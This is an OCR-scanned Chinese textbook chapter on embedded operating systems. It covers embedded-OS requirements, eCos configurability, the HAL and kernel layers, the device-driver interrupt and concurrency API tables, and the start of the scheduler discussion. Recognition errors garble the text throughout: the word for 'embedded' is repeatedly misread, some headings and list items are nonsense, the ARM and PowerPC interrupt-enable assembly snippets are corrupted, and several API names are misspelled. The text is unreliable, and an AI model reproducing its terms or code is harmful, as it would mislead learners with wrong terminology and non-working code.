与 通用 的 计算 机 ( 如 便携 式 电 脑 或 桌面 系统 ) 不 同 , 艇 入 式 系统 的 定义 涉及 一 个 产品 中 电子 
器 件 和 软件 的 使 用 。 下 面 给 出 一 个 较 好 的 通用 的 定义 8. 

骸 入 式 系统 是 为 了 完成 某 个 特定 功能 而 设计 的 ,或 许 有 附加 的 机 制 或 其 他 部 分 的 计算 机 硬件 
和 软件 的 结合 体 。 在 许多 情况 下 , 嵌入 式 系统 是 一 个 更 大 的 系统 或 产品 中 的 一 部 分 ,比如 汽车 中 
的 防 抱 死 系统 。 

和 嵌 人 式 系统 的 数量 远 远 超过 了 普通 的 操作 系统 ， 并 且 应 用 非常 广泛 ( 见 表 13.1 )。 这 些 系 统 
的 需求 和 限制 有 着 很 大 的 不 同 ， 如 下 所 示 [GRIM05] : 


表 13.1 和 骨 入 式 系统 范例 与 市 场 [NOER05] 







点 火 系统 
引擎 控制 
刹车 系统 
数字 及 模拟 电视 
MMA (DVD, VCR, ARW ) 
个 人 数字 助理 (PDA ) 
EKHAR ( 冰箱 、 烤 箱 、 微 波 炉 ) 
汽车 

玩具 /游戏 机 

电话 /手机 /寻呼机 

相机 

全 球 定位 系统 (GPS ) 

制造 业 的 机 器 人 以 及 控制 系统 
传感器 












消费 电子 







医疗 








传真 机 
复印 机 
打印 机 
显示 器 
扫描 仪 


办 公 自 动 化 


© Michael Barr, (Embedded Systems Glossary 》。Netrino 技术 图 书馆 http://www.netrino.com/ Publications/ 
Glossary/index.php. 
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@ 从 小 的 系统 到 大 的 系统 , 这 意味 着 非常 不 同 的 成 本 限制 , 也 就 是 对 优化 和 复 用 的 不 同 需求 。 
o 从 很 宽松 的 到 非常 严格 的 需求 ， 以 及 不 同性 质 的 需求 的 组 合 ， 例 如 关于 安全 性 、 可 靠 性 、 
实时 、 灵 活性 等 方面 。 
@ 从 很 短 到 很 长 的 使 用 期 限 。 
© 不 同 的 环境 条 件 ， 比 如 辐射 、 振 动 、 湿 度 等 方面 。 
@ 不 同 的 应 用 特点 ， 从 静态 到 动态 装载 ， 从 慢 到 快 的 速度 ， 从 计算 密集 型 到 交互 密集 型 任 
S$, 或 者 它们 中 的 不 同 组 合 。 
© 不 同 的 计算 模型 ， 从 离散 事件 系统 到 包含 连续 时 间 的 动态 系统 ( 通常 也 称 为 混合 系统 )。 
敌人 式 系统 通常 与 它们 所 在 的 环境 紧密 地 联系 在 一 起 。 由 于 与 环境 交互 的 需要 , 从 而 产生 了 
实时 限制 。 这 些 限制 , 如 响应 速度 、 测 量 精度 、 持 续 时 间 等 ,决定 了 软件 操作 的 时 限 。 如 果 多 个 
活动 必须 进行 同步 管理 ， 这 就 需要 更 复杂 的 实时 限制 。 
基于 [KOOP96], 图 13.1 最 示 了 一 般 定义 下 的 退 入 式 系 统 组 织 。 除 了 处 理 器 和 内 存 ， 还 有 很 
多 元 素 不 同 于 传统 的 台式 机 或 笔记 本 电脑 : 
© 或 许 有 不 同 的 接口 , 以 便 使 系统 能 进行 测量 、 计 算 或 者 与 外 部 环境 进行 交互 的 其 他 接口 。 
@ 用 户 界 面 可 以 是 简单 到 像 内 烁 的 灯 一 样 ， 也 可 以 像 实 时 机 器 人 视觉 那样 复杂 。 
@ 诊断 端口 可 以 诊断 系统 是 否 已 经 处 于 被 控 状 态 一 一 而 不 单 是 诊断 计算 机 。 
@ 特定 目的 领域 的 编程 (FPGA), REMI (ASIC) 其 至 非 数字 硬件 都 可 能 使 用 ， 以 增 
强 性 能 或 安全 性 。 
软件 通常 是 固定 功能 的 ， 并 且 特 定 于 某 个 应 用 。 





外 部 环境 
图 13.1 嵌入 式 系 统 可 能 的 组 织 结构 


13.2 RARE RSA A 


一 个 有 着 简单 功能 的 其 入 式 系统 , 可 以 由 一 个 或 一 组 特定 的 程序 , 在 没有 其 他 软件 的 情况 下 
进行 控制 。 HH, 更 复杂 的 敌人 式 系统 包括 一 个 操作 系统 。 尽 管 原则 上 可 以 使 用 一 个 通用 的 操作 
系统 ， 例 如 Linux， 对 于 嵌入 式 系统 ， 存 储 空间 的 限制 、 功 耗 和 实时 需求 都 要 求 为 嵌 人 式 系统 环 
境 使 用 专用 的 操作 系统 。 

下 面 列 出 一 些 肯 人 式 操 作 系 统 独特 的 特性 和 设计 需求 ， 

@ 实时 操作 : 在 许多 拉 人 式 系统 中 ， 计 算 的 准确 性 部 分 地 依靠 交付 的 时 间 。 通 常 ， 实 时 性 

受到 外 围 /O 和 控制 稳定 性 需求 的 限制 。 
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@ 响应 操作 : 嵌入 式 软件 可 以 对 外 部 事件 响应 进行 处 理 。 如 果 这 些 事件 的 发 生 不 是 周期 性 
的 或 者 是 不 可 预期 的 ， 能 人 式 软件 应 该 考虑 最 差 情 况 并 为 例 程 的 执行 设 定 优先 级 。 

@ 可 配置 性 : 由 于 岁入 式 系统 的 多 样 性 , 因此 在 嵌入 式 操作 系统 功能 性 需求 方面 是 多 变 的 ， 
不 论 是 定量 还 是 定性 的 。 也 就 是 说 ， 一 个 嵌 人 式 操作 系统 想 要 应 用 在 不 同 的 伐 人 式 系统 
中 时 ， 它 自身 必须 可 以 灵活 配置 ， 以 便 对 特定 的 应 用 和 硬件 系统 提供 所 需 的 功能 。 
[MARW06] 给 出 了 下 列 例 子 : 链接 和 加 载 功能 可 以 用 来 选择 需要 加 载 的 OS 模块 。 可 以 使 
用 条 件 编译 。 如 果 使 用 了 一 个 面向 对 象 结构 ， 就 可 以 定义 真子 类 。 实 际 上 ， 对 于 许多 经 
过 裁剪 的 衍生 操作 系统 进行 设计 时 ,验证 是 一 个 潜在 的 问题 。Takada 引用 这 些 作为 eCos 
的 基本 问题 [TAKA01]。 

@ I/O 设备 的 灵活 性 : 事实 上 , 没有 设备 需要 所 有 版 本 的 操作 系统 都 提供 支持 , 同时 IO 设 
备 涵盖 的 范围 也 很 大 。[MARW06] 中 建议 ， 对 于 处 理 相 应 的 慢 速 设备 ， 比 如 磁盘 和 网 络 
接口 ， 使 用 特定 任务 而 不 是 将 这 些 驱动 整合 进 操 作 系统 的 内 核 中 更 加 合理 。 

@ 改进 的 保护 机 制 : 敌人 式 系 统 通常 为 一 个 受 限 制 的 、 定 义 明确 的 功能 而 设计 。 没 有 经 过 
测试 的 程序 很 少 加 到 软件 中 去 。 在 软件 配置 和 测试 之 后 ， 就 应 该 被 视 为 可 靠 的 了 。 也 就 
是 说 ， 除 安全 措施 外 ,敌人 式 系统 只 有 有 限 的 保护 机 制 。 例 如 ，IO 指令 不 必 是 那些 可 以 
陷 人 操作 系统 内 核 的 特权 指令 ; 任务 可 以 直接 完成 它们 自己 的 IO。 类 似 地 , 存储 保护 机 
制 也 可 以 被 最 小 化 。[MARW06] 提 供 了 下 列 例子 。 让 switch 对 应 某 个 值 的 内 存 - 映 射 的 
IO 地 址 ， 该 值 需 要 作为 IO 操作 的 一 部 分 进行 检查 。 我 们 可 以 允许 VO 程序 使 用 一 条 像 
load register 这 样 的 指令 ，switch 决定 当时 的 值 。 这 种 方法 更 适合 用 于 一 次 操作 
系统 服务 调用 中 ， 为 了 保存 和 恢复 任务 上 下 文 ， 该 方法 会 产生 系统 开销 。 

e 直接 使 用 中 断 : 通用 操作 系统 不 会 允许 用 户 进程 直接 使 用 中 断 。[MARW06] 列 出 了 3 个 
允许 不 通过 操作 系统 中 断 服务 例 程 ， 而 让 中 断 直 接 开始 和 结束 任务 ( 例如 ， 将 中 断 向 量 
地 址 表 中 的 任务 起 始 地 址 存储 起 来 ) 的 原因 : 1) 可 认为 柑 入 式 系统 是 彻底 地 测试 过 的 ， 

很 少 对 操作 系统 或 者 应 用 程序 进行 修改 ; 2 ) 不 需要 保护 机 制 ， 如 前 面 列 出 的 理由 ; 3 ) 必 
KEL EUCHE A. 

一 般 有 两 种 通用 的 方法 来 开发 租 入 式 操 作 系 统 。 第 一 种 方法 是 利用 现 有 的 操作 系统 ， 移 植 它 

使 之 适用 于 骨 人 式 应 用 。 另 一 种 方法 是 为 戏 人 式 设备 的 使 用 单独 设计 和 实现 所 需要 的 操作 系统 9。 


13.2.1 移植 现 有 的 商业 操作 系统 


通过 增加 实时 能 力 、 流 水 线 操 作 和 必要 的 功能 ， 现 有 的 商业 操作 系统 可 以 用 于 舱 和 人 式 系统 。 
这 种 方法 通常 利用 Linux， 也 可 利用 FreeBSD 、Windows 和 其 他 通用 操作 系统 。 这 些 操作 系统 一 
般 比 专用 的 嵌入 式 操作 系统 慢 , 且 可 预见 性 较 差 。 这 种 方法 的 优点 是 直接 从 一 般 性 商业 操作 系统 
派生 出 嵌入 式 操 作 系 统 ， 是 基于 一 系列 成 熟 的 接口 ， 可 以 方便 地 移植 。 

使 用 通用 操作 系统 的 缺点 是 它 并 没有 对 实时 性 和 和 伐 和 人 式 应 用 进行 优化 。 也 就 是 说 , 要 达到 适 
当 的 性 能 , 需要 进行 很 大 的 修改 。 特别 地 , 典型 的 操作 系统 在 调度 上 是 为 一 般 情况 进行 优化 而 不 
是 为 最 差 情况 进行 优化 ， 通 常 按 照 需求 分 配 资源 ， 并 且 和 忽略 大 多 数 关 于 应 用 程序 的 语义 信息 。 


13.2.2 为 特定 目的 构建 的 嵌入 式 操 作 系统 


现在 已 经 有 数目 众多 的 操作 系统 是 专 为 符 人 式 应 用 而 设计 的 。 后 面 有 两 个 著名 的 实例 ， 即 
eCos 和 TinyOS， 都 会 在 本 章 中 进行 讨论 。 


O 13.2 节 的 许多 讨论 是 基于 位 于 圣迭戈 的 加 州 大 学 的 Rajesh Gupta 教授 提供 的 媒人 式 系 统 的 课堂 笔记 。 网 址 为 
http://mesl.ucsd.edu/gupta/cse237bw07.html, 
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a E 
© 有 快速 且 轻 量 级 的 进程 或 线程 切换 。 
调度 策略 是 实时 的 ， 调 度 模 块 是 调度 程序 的 一 部 分 而 不 是 单独 的 模块 。 
尺寸 很 小 。 
能 快速 响应 外 部 中 断 ， 典 型 的 需求 是 响应 时 间 小 于 10hs。 
禁止 中 断 的 时 间 间 隔 尽 可 能 的 小 。 
为 内 存 管理 提供 固定 的 或 者 可 变 的 分 区 ， 以 及 为 存储 器 中 的 代码 和 数据 加 锁 的 能 力 。 
@ 提供 特别 的 顺序 文件 以 便 快速 存储 数据 。 
为 了 处 理 时 序 约束 ， 内 核 需要 
© 为 大 部 分 原 语 提 供 有 限制 的 执行 时 间 。 
@ 维护 一 个 实时 的 时 钟 。 
o 提供 特定 的 警报 和 超时 。 
© 支持 实时 排队 策略 ， 比 如 最 早 截止 时 间 优 先 和 将 消息 插入 到 队列 头 的 原 语 。 
© 提供 固定 时 间 延 迟 处 理 的 原 语 和 挂 起 /恢复 执行 的 原 语 。 
上 述 列 出 的 特性 是 在 实时 需求 下 能 人 式 操 作 系统 很 常见 的 特性 。 实 际 上 , 对 于 复杂 的 舱 人 式 
系统 ， 需 求 可 能 强调 可 预见 性 操作 胜 过 快速 操作 , 这 就 迫使 做 出 不 同 的 设计 决策 , 特别 是 任务 调 
度 方面 。 


13.3 eCos 


在 嵌入 式 应 用 中 ，eCos (embedded Configurable operating sgstem ) 是 一 个 开源 的 、 版 权 自 由 
的 实时 操作 系统 。 该 系统 的 设计 目标 是 高 性 能 的 、 小 型 的 嵌入 式 系统 。 对 于 这 类 系统 ，Linux 或 
者 其 他 商业 操作 系统 的 敌人 式 版 本 不 会 提供 所 需要 的 改进 过 的 软件 。eCos 已 经 广泛 应 用 于 不 同 
的 处 理 器 平台 ， 包 括 Intel IA32, PowerPC, SPARC, ARM, CalmRISC, MIPS 和 NEC V8xx。 
它 是 应 用 最 广泛 的 敌人 式 操作 系统 之 一 。 


13.3.1 可 配置 性 


要 想 广 泛 应 用 于 不 同 的 柑 人 式 应 用 和 广 入 式 平台 , 嵌入 式 操作 系统 要 足够 灵活 , 必须 提供 比 
特定 的 应 用 和 平台 更 多 的 功能 。 例如 , 许多 实时 操作 系统 支持 任务 切换 、 并 发 控制 和 不 同 的 优先 
级 调度 机 制 。 而 相对 简单 嵌入 式 系统 不 一 定 需 要 所 有 这 些 特性 。 

为 配置 可 选 组 件 和 在 组 件 中 允许 或 禁止 特定 功能 而 提供 一 个 高 效 的 用 户 友 好 的 机 制 是 一 项 
挑战 。 可 在 Windows 或 者 Linux 下 运行 的 eCos 的 配置 工具 ， 用 于 配置 运行 在 目标 媒人 入 式 系统 上 
的 一 个 eCos 包 . 完整 的 eCos 包 是 分 层 结构 的 , 使 得 使 用 配置 工具 装配 目标 配置 很 容易 。 EME, 
eCos 由 一 些 组 件 组 成 ,进行 配置 工作 的 用 户 可 以 只 选择 那些 目标 应 用 中 所 需 的 组 件 。 例 如 ， 系 
统 可 能 有 一 个 特定 串口 IO 设备 ， 用 户 可 以 为 这 个 配置 选择 串口 UO， 然 后 可 以 选择 一 个 或 者 更 
多 特定 的 受 支 持 的 WO 设备 。 配 置 工具 包括 为 该 种 支持 所 需 的 最 小 的 软件 包 。 配 置 用 户 可 以 选择 
特定 的 参数 ， 比 如 默认 的 数据 速率 和 要 使 用 的 1/0 缓冲 区 的 大 小 。 

配置 过 程 可 以 扩展 到 更 加 细节 的 层次 , 其 至 是 单独 一 行 代 码 的 层次 。 例如， 配置 工具 提供 包 
含 或 者 忽略 优先 级 继承 协议 的 选项 。 

图 13.2 显示 了 eCos 配置 工具 用 户 可 以 看 到 的 顶层 。 左手 边 窗口 列表 中 的 每 个 选项 可 以 选择 
或 不 选择 。 l 

当 一 个 选项 标记 为 高 亮 时 , 右 下 方 的 窗口 提供 了 该 选项 的 说 明 , 右上 方 的 窗口 提供 了 进一步 
说 明文 档 的 连接 ， 还 有 该 高 亮 选 项 额外 的 信息 。 列 表 中 的 选项 可 以 展开 为 更 细 粒 度 的 选项 菜单 。 
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图 13.3 说 明了 eCos 内 核 选项 的 展开 菜单 。 在 图 中 , 注意 异常 处 理 已 被 选择 , 但 SMP ( 对 称 多 处 
理 ) 被 忽略 。 一般 来 说 , 可 以 选 定 或 者 忽略 组 件 或 者 单个 选项 。 在 一 些 情 况 下 ,可 以 设 定单 独 的 
变量 值 ， 例 如 ， 最 小 的 可 接受 的 栈 大 小 是 一 个 整数 值 ， 可 以 设 定 该 值 或 者 保留 默认 值 。 
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图 13.4 展示 了 一 个 典型 的 例子 ， 在 嵌 人 式 系 统 中 创建 可 执行 二 进 制 映像 的 整个 过 程 。 这 个 
过 程 运行 在 宿主 机 系统 上 ， 比 如 Windows 或 Linx 平台 ， 可 执行 映像 将 会 在 目标 嵌 人 式 系 统 中 
执行 ， 比 如 某 个 工业 环境 中 的 一 个 传感器 。 特 定 的 嵌入 式 应 用 的 应 用 源码 处 在 最 高 的 软件 层 。 这 
些 源码 独立 于 eCos, 但 是 应 用 编程 接口 ( API) 处 在 eCos 软件 的 顶层 。 或 者 只 有 一 种 版 本 的 应 
用 源码 , 或 者 对 不 同 版 本 的 目标 髓 人 式 平台 有 不 同 的 变种 。 在 这 个 例子 中 ，GNU make 工具 用 于 
选 定 哪 些 程序 需要 编译 或 者 重 编译 ( 在 源码 修改 版 本 的 情况 下 ), 并 且 发 出 命令 来 编译 这 些 源码 。 
GNU 交叉 编译 器 在 宿主 机 上 执行 ,然后 为 目标 嵌入 式 平台 生成 可 执行 二 进 制 码 。GNU 连接 器 连 
接应 用 目标 代码 和 由 eCos 配置 工具 产生 的 代码 。 这 个 软件 集 包 括 选 定 部 分 的 eCos 内 核 加 上 为 目 
标 幅 入 式 系统 选 定 的 软件 。 其 结果 随后 就 可 以 装 入 目标 系统 。 
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13.3.2 eCos 组 件 


eCos 的 关键 设计 需求 是 可 移植 性 ， 从 而 对 不 同 的 体系 结构 和 平台 只 需 最 小 的 工作 量 。 要 满 
足 这 个 需求 ，eCos 由 一 组 分 层 的 组 件 构成 ( 见 图 13.5 ) 。 





图 13.4 装 人 一 个 eCos 配置 Bi 13.5 eCos 分 层 结构 


硬件 抽象 层 

最 底部 是 硬件 抽象 层 (HAL) HAL 是 一 种 软件 ， 它 对 上 层 提供 一 致 的 API， 并 将 上 层 的 操 
作 映 射 到 特定 的 硬件 平台 ， 因 此 每 种 硬件 平台 的 HAL 都 是 不 同 的 。 图 13.6 中 的 例子 说 明了 在 两 
个 不 同 的 平台 上 ， 为 了 实现 相同 的 API 调用 ，HAL 是 怎样 进行 特定 于 硬件 实现 的 抽象 的 。 如 本 
例 所 示 ， 上 层 使 能 中 断 的 调用 在 两 个 平台 上 是 一 样 的 ， 但 是 该 功能 的 C 代码 实现 是 特定 于 每 个 
平台 的 。 


#define HAL ENABLE INTERRUPTS () 
asm volatile ( 

"mre r3, cper;* 

“bie £3, 23, $0xcd;* 

"mrs cpsr,r3;" 


PPS AP AP ES 





a) ARM 体系 结构 


#define HAL ENABLE INTERRUPTS () 
CYG MACRO START 
cyg_uint32 tmpl, tmp2 
asm volatile ( 
"mfmsr %0;" 


"ori %1,%1,0x800;" 


"rlwimi %0,%1,%0,16,16;" 
"mtmsr %01" 
:"=r" (tmpl),"=r" (tmp2)); 
0 CYG MACRO END 
b ) PowerPC 体系 结构 


图 13.6 Hal_Enable_Interrupts() 宏 的 两 种 实现 
HAL 由 三 个 单独 的 模块 实现 : 


© 体系 结构 : 定义 处 理 器 家 族 类 型 。 该 模块 包含 支持 处 理 器 启动 、 中 断 分 发 、 上 下 文 切换 、 
和 其 他 特定 于 该 处 理 器 家 族 指令 集体 系 结构 的 特定 功能 的 所 需 代码 。 


PA OP” BE OPT 
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@ SK: 支持 家 族 中 特定 处 理 器 的 特性 。 所 支持 特性 的 一 个 例子 就 是 片上 模块 ， 比 如 内 存 
管理 单元 (MMU ) 。 

@ 平台 : 将 HAL 扩展 以 便 支 持 紧密 连接 的 外 围 设备 ,如 中 断 控制 器 和 定时 器 。 这 个 模块 定 
义 包括 所 选择 的 处 理 器 体系 结构 和 变 体 的 平台 或 者 主板 。 它 包括 启动 代码 、 片 上 配置 代 
码 、 中 渐 控 制 器 代码 和 定时 器 代码 。 

TEM, HAL 的 接口 可 以 直接 被 上 层 调用 ， 以 提高 代码 执行 效率 。 

eCos 内 核 

eCos 内 核 设 计 主 要 满足 下 列 四 个 目标 : 

@ 低 中 断 延 迟 : 响应 中 断 和 开始 执行 ISR 的 时 间 。 

@ 低 任务 切换 延迟 : 当 一 个 线程 可 用 并 实际 开始 执行 时 所 用 的 时 间 。 

@ 小 内 存 占用 : 通过 按照 实际 需求 配置 所 有 组 件 的 内 存 ， 以 便 使 代码 和 数据 占用 的 内 存 资 


源 尽 可 能 地 小 。 
o 确定 的 行为 : 在 整个 执行 过 程 中 ， 内 核 执 行 必须 是 可 预测 的 ， 并 且 是 在 满足 应 用 程序 实 
时 性 需求 的 限制 下 。 


eCos 内 核 提 供 了 为 开发 多 线程 应 用 所 需 的 核心 功能 : 

1 ) 在 系统 中 创建 新 线程 的 能 力 ， 不 论 是 在 启动 时 刻 还 是 在 系统 的 运行 时 刻 。 

2) 在 系统 中 控制 不 同 的 线程 ， 例 如 ， 操 作 它 们 的 优先 级 。 

3) 调度 器 的 选择 ， 从 而 决定 哪个 线程 应 该 运行 。 

4) 同步 原 语 的 范围 ， 允 许 线程 安全 地 交互 和 共享 数据 。 

5) 系统 对 中 断 和 异常 的 支持 。 

在 eCos 内 核 中 并 没有 包括 操作 系统 内 核 的 一 些 典 型 功能 。 例 如 ， 内 存 分 配 由 一 个 独立 的 包 
处 理 。 同 样 ， 不同 的 设备 驱动 也 是 独立 的 包 。eCos 配置 技术 将 不 同 的 包 结 合并 进行 配置 以 满足 
应 用 的 需求 。 这 样 可 以 使 内 核 精 简 。 更 进一步 ,对 于 一 些 宜 人 式 平 台 , 最 小 的 内 核 意 味 着 并 没有 
采用 eCos 内 核 。 简单 的 单线 程 应 用 可 以 直接 在 HAL 上 运行 。 这 样 的 配置 可 以 并 入 所 需 的 C 功 
能 库 以 及 设备 驱动 ， 但 是 避免 了 内 核 在 空间 和 时 间 上 的 开销 。 

VO 系统 

eCos 的 IO 系统 是 一 个 支持 设备 驱动 的 框架 。eCos 配置 包 为 大 量 的 平台 提供 各 种 驱动 。 这 
些 驱动 包括 了 串口 设备 、 以 太 网 设备 、 闪 存 接口 和 不 同 的 VO 接口 如 PCI (外 围 部 件 接口 ) 和 
USB (统一 串 行 总 线 ) 。 另 外 ， 用 户 可 以 开发 自己 的 设备 驱动 。 

VO 系统 的 主要 目标 是 效率 ， 含 弃 不 需要 的 软件 层 或 者 无 关 功能 。 设 备 驱动 为 输入 、 答 出 、 
缓冲 和 设备 控制 提供 必要 的 功能 。 

如 上 文 所 述 ， 如 果 需 要 设备 驱动 和 其 他 更 高 层 的 软件 ， 可 以 直接 在 HAL 层 上 实现 。 如 果 和 需 
要 特定 内 核 类 型 的 功能 , 设备 驱动 可 以 使 用 内 核 API 实现 。 内 核 提 供 了 三 层 中 断 模型 [ECOS07]: 

o 中 断 服务 例 程 (ISR ): 在 响应 硬件 中 断 时 调用 。 硬 件 中 断 在 将 干扰 降 到 最 小 的 情况 下 递 

送 至 ISR, HAL 对 中 断 硬 件 源 进 行 解 码 ， 并 且 调 用 关联 该 中 断 对 象 的 ISR。 这 个 ISR 可 以 
操作 硬件 ， 但 是 仅仅 允许 在 设备 API 上 进行 一 组 有 限制 的 调用 。 当 返回 时 ，ISR 就 会 查 
询 它 的 DSR 是 否 应 该 被 调度 执行 。 

@ 延迟 服务 例 程 (DSR ) : 在 响应 ISR 的 请 求 时 调用 。 当 一 个 DSR 不 会 影响 调度 时 ， 它 是 
安全 的 ， 从 而 可 以 运行 。 大 部 分 时 间 ，DSR 会 在 ISR 之 后 立刻 运行 ， 但 是 当前 线程 在 调 
度 队 列 中 时 ， 在 线程 结束 之 前 ，DSR 会 被 延迟 。DSR 可 以 调用 更 多 的 驱动 API ( 相对 于 
ISR) ， 特 别 是 可 以 调用 cyg_drv_cond signal() 来 唤醒 等 待 的 线程 。 
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@ 线程 : 驱动 的 客户 。 线 程 可 以 调用 全 部 的 API， 而 且 可 以 在 互 斥 量 和 条 件 变量 上 等 待 。 

表 13.2 和 13.3 显示 了 内 核 设备 驱动 接口 。 这 些 表 对 内 核 支持 的 设备 驱动 的 可 用 功能 给 出 了 
很 好 的 解释 。 注 意 , 可 以 为 设备 驱动 接口 配置 下 列 一 个 或 多 个 并 发 机 制 : 自 旋 锁 、 条 件 变 量 、 互 
斥 量 。 后 面 将 详细 讨论 。 


表 13.2 eCos 内 核 设 备 驱 动 接 口 : 并 发 


cyg_drv_spinlock_init 将 自 旋 锁 初始 化 为 如 锁 或 者 未 加 锁 的 状态 

cyg_ drv_spinlock_destroy 释放 一 个 长 时 间 没 有 使 用 的 自 旋 锁 

cyg_drv_spinlock spin 申请 一 个 自 旋 锁 ， 在 位 状态 循环 中 等 待 ， 直 至 该 自 旋 锁 可 用 
cyg_drv_spinlock_clear 清除 一 个 自 旋 锁 。 这 个 操作 清除 自 旋 锁 ， 允许 其 他 CPU 申请 它 。 如 果 


有 多 于 一 个 CPU 在 cyg drv_spinlock spin 中 等 待 , 那么 接 下 来 仅 
有 一 个 CPU 允许 执行 


cyg_drv_spinlock_test 检查 自 旋 锁 的 状态 。 如 果 自 旋 锁 没有 锁 ， 则 返回 TRUE。 如 果 已 被 锁 ， 
则 返回 FALSE 
cyg_drv spinlock spin intsave 这 个 功能 行为 确切 说 像 cyg_drv_spinlock_spin， 只 是 它 在 试图 


申请 自 旋 锁 之 前 还 能 禁止 中 断 。 当 时 的 中 断 使 能 状态 保存 在 *istate 中 。 
中 断 在 自 旋 锁 申 请 成 功 之 前 都 保持 禁止 中 断 ， 并 且 必 须 调用 cyg_arv_ 


spinlock_clear_intsave 恢复 其 状态 


cyg_drv_mutex_init 初始 化 互 斥 量 
cyg drv_ mutex destroy 销毁 互 斥 量 
cyg_drv_mutex_lock 试图 为 mutex 参数 指向 的 互 斥 量 加 锁 。 如 果 互 斥 量 已 经 被 其 他 线程 加 


锁 ， 则 本 线程 一 直 等 待 ， 直 到 加 锁 互 斥 量 的 线程 结束 。 如 果 函 数 返 回 值 
为 FALSE， 则 本 线程 解除 由 其 他 线程 造成 的 加 锁 状 态 。 在 这 种 情况 下 ， 
互 斥 量 不 会 被 锁 上 

cyg_drv_mutex trylock 试图 为 mutex 参数 指向 的 互 斥 量 加 锁 ， 但 是 不 等 待 。 如 果 互 斥 量 已 经 
PHO Bat, Wes AGRI FALSE。 如 果 汞 数 可 以 在 不 等 待 的 情况 下 
加 锁 互 斥 量 ， 则 返回 TRUE 











cyg_drv_mutex_unlock 为 mutex 参数 指向 的 互 斥 量 解锁 . 如 果 已 经 有 一 些 线程 等 待 请 求 该 锁 ， 
则 唤醒 其 中 一 个 从 而 尝试 获取 互 斥 量 

cyg_drv_mutex_release 释放 所 有 在 该 互 斥 量 上 等 待 的 线程 

eyg_drv_cond_init 初始 化 一 个 和 某 个 互 斥 量 关 联 的 条 件 变量 。 一 个 线程 在 为 相关 的 互 斥 


量 加 锁 后 有 可 能 在 该 条 件 变量 上 等 待 。 等 待 会 导致 该 互 斥 量 的 解锁 ， 在 
该 线程 再 次 被 唤醒 之 后 ， 它 在 继续 执行 之 前 会 自动 申请 该 互 斥 量 


cyg_drv_cond destroy 销毁 条 件 变 量 

cyg drv_cond wait 等 待 条 件 变量 的 信号 

cyg_drv cond signal 向 条 件 变量 发 送信 号 。 如 果 有 线程 在 等 待 这 个 变量 ， 则 至 少 其 中 有 一 
个 线程 将 被 唤醒 

cyg_drv_cond_broadcast 向 条 件 变 量 发 送信 号 。 如果 有 线程 在 等 待 这 个 变量 ， 则 所 有 线程 都 会 
被 唤醒 





表 13.3 eCos 内 核 设 备 驱动 接口 : PH 


cyg_drv_isr_lock 禁止 中 断 的 分 发 ， 阻 止 所 有 ISR 的 运行 。 本 函数 维护 着 一 个 它 被 调用 
的 次 数 的 计数 器 
cyg_drv_isr_unlock 使 能 中 断 的 分 发 ， 人 允许 ISR 运行 。 本 函数 递减 由 cyq_dry_isr_lock 


维护 的 计数 器 ， 当 计数 器 为 0 时 ， 再 次 允许 中 断 
cyg_ISR t 定义 ISR 
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cyg_drv_dar_ lock 


cyg_drv_der_ unlock 


cyg DSR_t 
cyg_drv_interrupt_create 
cyg_drv_interrupt delete 
cyg_drv_interrupt_ attach 
cyg drv_interrupt detach 
cyg_drv_interrupt_ mask 


cyg_drv_interrupt_mask_intunsafe 


eyg_drv_interrupt_unmask,cyg drv_ 
interrupt_unmask_intunsafe 

cyg_ drv_interrupt_acknowledge 
cyg_drv_interrupt_configure 

cyg drv_interrupt_level 


cyg_drv_interrupt_set_cpu 





( & ) 
禁止 DSR 的 调度 。 本 函数 维护 着 一 个 它 被 调用 的 次 数 的 计数 器 
使 能 调度 DSR。 本 函数 递减 由 cyq dry dsr_lock 维护 的 计数 


器 .只 有 当 计 数 器 变 为 0 时 ， 才 会 允许 DSR 的 分 发 


定义 DSR 原型 

创建 一 个 中 断 对 象 并 且 返 回 一 个 处 理 句 柄 

从 中 断 向 量 表 中 删除 中 断 ， 并 且 释 放 内 存 以 便 再 次 使 用 

向 向 量 表 中 添加 中 断 ， 当 中 断 发 生 时 ， 中 断 就 可 以 传递 到 ISR 
从 中 断 向 量 表 中 删除 中 断 ， 从 而 该 中 断 不 再 被 分 发 给 ISR 

对 中 断 控 制 器 进行 编程 ， 从 而 在 给 定 的 向 量 表 中 停止 中 断 的 分 发 
对 中 断 控 制 器 进行 编程 ， 从 而 在 给 定 的 向 量 表 中 停止 中 断 的 分 发 。 


此 版 本 与 cyg_drv_interrupt _magk 的 不 同 之 处 在 于 其 中 断 是 不 安 
全 的 。 因此 在 诸如 已 知 中 断 被 禁止 的 情况 下 , 这 样 可 以 避免 额外 的 开销 


对 中 断 控制 器 编程 , 使 得 可 以 在 给 定 的 向 量 表 中 青 次 允许 分 发 中 断 
完成 中 断 控制 器 中 所 需 任 意 的 处 理 ， 并 且 在 CPU 中 取消 当前 中 断 请 求 
按照 中 断 源 的 特征 进行 中 断 控制 器 的 编程 

对 中 断 控制 器 进行 编程 ， 从 而 按照 提供 的 优先 级 级 别 分 发 中 断 
在 多 处 理 器 系统 中 , 此 函数 使 在 给 定向 量 表 中 的 所 有 中 断 可 以 发 送 


到 特定 的 CPU。 随后， 该 CPU 可 以 处 理 相应 的 中 断 
在 多 处 理 器 系统 中 ,该 函数 返回 当前 正在 分 发 的 中 断 的 目标 CPU 的 ID 


cyg_drv_interrupt_get_cpu 
C 标准 库 

提供 完整 的 C 运行 时 标准 库 。 同 时 包括 一 个 用 于 高 层次 数学 函数 的 完整 的 数学 运行 时 库 ， 
以 及 一 个 用 于 没有 硬件 浮 点 功能 的 平台 的 完整 的 IEEE-754 浮 点 库 。 


13.3.3 eCos 调度 程序 


eCos 的 内 核 可 以 在 已 设计 好 的 两 种 调度 程序 中 选择 一 种 进行 配置 : 位 图 调度 和 多 级 队列 调 
度 。 进 行 配 置 的 用 户 针对 其 环境 和 应 用 选择 合适 的 调度 程序 。 位 图 调度 适用 于 在 任何 时 间 点 上 活 
动 的 线程 数目 较 少 的 系统 , 位 图 调度 可 以 为 其 提供 高 效 的 调度 。 多 级 队列 调度 适用 于 线程 数量 是 
动态 的 或 者 有 多 个 相同 优先 级 的 线程 的 情况 。 多 级 队列 调度 也 同样 适用 于 时 间 片 的 情况 。 
位 图 调度 

位 图 调度 支持 多 优先 级 , 但 是 在 任意 时 刻 , 每 个 优先 级 只 能 有 一 个 线程 存在 。 在 此 调度 程序 
中 ， 调 度 决 策 是 相当 简单 的 ( 见 图 13.7a ) 。 当 一 个 阻塞 的 线程 变 为 准备 运行 时 ， 它 可 以 抢占 优 
